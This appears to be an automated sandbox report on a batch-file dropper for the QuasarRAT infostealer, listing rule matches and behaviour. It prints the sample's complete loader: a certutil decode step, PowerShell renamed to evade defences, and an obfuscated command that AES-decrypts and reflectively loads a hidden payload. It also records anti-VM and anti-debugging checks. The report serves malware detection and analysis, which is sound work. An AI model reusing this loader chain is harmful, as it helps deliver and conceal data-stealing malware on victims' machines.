          Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPEMatched rule: Detects Quasar infostealer Author: ditekshen
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects QuasarRAT malware Author: Florian Roth (Nextron Systems)
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Quasar infostealer Author: ditekshen
          Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
          Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 4.2.allah.bat.exe.20e693c0000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
          Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
          Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 4.2.allah.bat.exe.20e693c0000.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 4.2.allah.bat.exe.20e62ced3d0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth (Nextron Systems), description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10, modified = 2023-01-06
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 00000004.00000002.681432243.0000020E693C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC11B9D64_2_00007FFBAC11B9D6
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC119E224_2_00007FFBAC119E22
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC1112684_2_00007FFBAC111268
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC1190764_2_00007FFBAC119076
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC112D984_2_00007FFBAC112D98
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC1107D14_2_00007FFBAC1107D1
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC1108034_2_00007FFBAC110803
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC110C904_2_00007FFBAC110C90
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5A7F594_2_00007FFBAC5A7F59
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5AEBED4_2_00007FFBAC5AEBED
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5A94564_2_00007FFBAC5A9456
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5AD84C4_2_00007FFBAC5AD84C
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5AA3354_2_00007FFBAC5AA335
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\allah.bat.exe D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677
          Source: deneme.batVirustotal: Detection: 16%
          Source: C:\Windows\System32\mode.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 60,3
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com Mode 60,3 Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe CERTUTIL -f -decode "C:\Users\user\Desktop\deneme.bat" "C:\Users\user\AppData\Local\Temp\allah.bat" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\allah.bat.exe "allah.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $lILxN = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\allah.bat').Split([Environment]::NewLine);foreach ($vOhpq in $lILxN) { if ($vOhpq.StartsWith(':: ')) { $OHwZk = $vOhpq.Substring(3); break; }; };$PPhGD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($OHwZk);$YGMef = New-Object System.Security.Cryptography.AesManaged;$YGMef.Mode = [System.Security.Cryptography.CipherMode]::CBC;$YGMef.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$YGMef.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6pNVYWetf4chAWo/pEbNaRZ3xRLeWmBPF3OumGmDVww=');$YGMef.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxQsLBFdvl0gyeVxt5ivJg==');$blbua = $YGMef.CreateDecryptor();$PPhGD = $blbua.TransformFinalBlock($PPhGD, 0, $PPhGD.Length);$blbua.Dispose();$YGMef.Dispose();$MkYmI = New-Object System.IO.MemoryStream(, $PPhGD);$wtLBU = New-Object System.IO.MemoryStream;$JeXHz = New-Object System.IO.Compression.GZipStream($MkYmI, [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\allah.bat.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winBAT@8/6@0/1
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeMutant created: \Sessions\1\BaseNamedObjects\Local\c60dc807-eaae-43be-9bb5-d598c7ab3dad
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4652:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$JeXHz.CopyTo($wtLBU);$JeXHz.Dispose();$MkYmI.Dispose();$wtLBU.Dispose();$PPhGD = $wtLBU.ToArray();$weWpP = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($PPhGD);$BDLvJ = $weWpP.EntryPoint;$BDLvJ.Invoke($null, (, [string[]] ('')))@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques"
          Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\deneme.bat" "
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: deneme.batStatic file information: File size 2277691 > 1048576
          Source: Binary string: powershell.pdbUGP source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
          Source: Binary string: powershell.pdb source: allah.bat.exe, 00000004.00000000.368737034.00007FF7EB5BA000.00000002.00000001.01000000.00000004.sdmp, allah.bat.exe.0.dr
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC11FA92 pushad ; ret 4_2_00007FFBAC11FAA9
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC122BAA push eax; retf 4_2_00007FFBAC122CA3
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC122C83 push eax; retf 4_2_00007FFBAC122CA3
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC1E5334 push esi; iretd 4_2_00007FFBAC1E5337
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5AE1A1 push edx; iretd 4_2_00007FFBAC5AE51B
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC5A7149 push eax; ret 4_2_00007FFBAC5A72EC
          Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\allah.bat.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeFile opened: C:\Users\user\AppData\Local\Temp\allah.bat.exe:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Renames powershell.exe to bypass HIPS
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exe TID: 3320Thread sleep time: -2767011611056431s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeWindow / User API: threadDelayed 9093Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: deneme.batBinary or memory string: TnJOMEMzU29pQnNGcDI3KzNpbjJTQzU1T2xqSFBsOXFjazMvc21tWmtlZXJPRlFs
          Source: allah.bat.exe, 00000004.00000002.633628598.0000020E50F0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: allah.bat.exe, 00000004.00000002.684807459.0000020E69C2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: deneme.batBinary or memory string: c0xsTHFKTGhqemU5NWhvb1ZYMXlKdXBxZDllWXdCcmNqNmp3T2J1dlVSZzhjZzIv
          Source: deneme.batBinary or memory string: TXorajdZTlRaeWpSNURaeTRBZTlCRXg1ZjM4RkRPN0hrQkxjQTk1YVRkVmNETkxZ

          Anti Debugging

          barindex
          Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeCode function: 4_2_00007FFBAC11AA8A CheckRemoteDebuggerPresent,4_2_00007FFBAC11AA8A
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\allah.bat.exeProcess queried: DebugPortJump to behavior
